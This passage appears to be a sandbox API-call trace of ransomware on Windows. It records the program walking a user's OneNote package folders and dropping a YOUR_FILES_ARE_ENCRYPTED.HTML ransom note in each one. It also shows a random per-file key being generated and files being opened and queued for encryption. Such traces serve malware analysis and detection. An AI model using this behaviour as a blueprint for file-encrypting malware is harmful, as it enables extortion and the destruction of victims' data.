lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.853] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.854] CloseHandle (hObject=0x320) returned 1 [0116.854] GetProcessHeap () returned 0x600000 [0116.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.854] GetProcessHeap () returned 0x600000 [0116.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.854] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.854] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.855] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache") returned 98 [0116.855] GetProcessHeap () returned 0x600000 [0116.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.855] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache" [0116.855] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache\\*" [0116.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.856] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.856] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.856] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.856] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0116.856] GetProcessHeap () returned 0x600000 [0116.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.857] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.858] CloseHandle (hObject=0x320) returned 1 [0116.858] GetProcessHeap () returned 0x600000 [0116.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.858] GetProcessHeap () returned 0x600000 [0116.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.858] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64a7f460, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64a7f460, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.859] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.859] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState") returned 98 [0116.859] GetProcessHeap () returned 0x600000 [0116.859] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.859] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState" [0116.859] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState\\*" [0116.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64a7f460, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64a7f460, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.860] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64a7f460, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64a7f460, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.860] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64a7f460, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64a7f460, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.860] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.860] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0116.860] GetProcessHeap () returned 0x600000 [0116.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.861] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.861] CloseHandle (hObject=0x320) returned 1 [0116.861] GetProcessHeap () returned 0x600000 [0116.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.862] GetProcessHeap () returned 0x600000 [0116.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.862] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0116.862] StrStrIW (lpFirst="Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.862] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe") returned 147 [0116.862] GetProcessHeap () returned 0x600000 [0116.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.862] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe" [0116.862] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\*" [0116.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.862] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.862] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65513f2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.862] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.862] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 163 [0116.862] GetProcessHeap () returned 0x600000 [0116.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.863] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore" [0116.863] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0116.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65513f2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.865] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65513f2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 1 [0116.865] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x658cda37, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x658cda37, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.865] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.865] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 183 [0116.865] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.865] lstrlenW (lpString=".dat") returned 4 [0116.865] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.865] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\microsoft.office.onenote_17.6131.10051.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0116.866] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=262144) returned 1 [0116.866] GetProcessHeap () returned 0x600000 [0116.866] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.868] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="0C") returned 2 [0116.868] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="8B") returned 2 [0116.868] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="7E") returned 2 [0116.868] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="23") returned 2 [0116.868] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="3A") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="E0") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="FD") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="EE") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D6") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="25") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="09") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="9A") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="2A") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="26") returned 2 [0116.868] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="33") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="58") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3D") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="49") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="A0") returned 2 [0116.869] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="17") returned 2 [0116.869] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="37") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="EC") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A6") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="DA") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="5E") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="05") returned 2 [0116.869] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="13") returned 2 [0116.869] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="E9") returned 2 [0116.869] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2B") returned 2 [0116.869] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="33") returned 2 [0116.869] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="57") returned 2 [0116.869] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="2E") returned 2 [0116.869] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0116.869] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.869] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.870] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x654edd0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x654edd0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x654edd0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.870] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.870] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 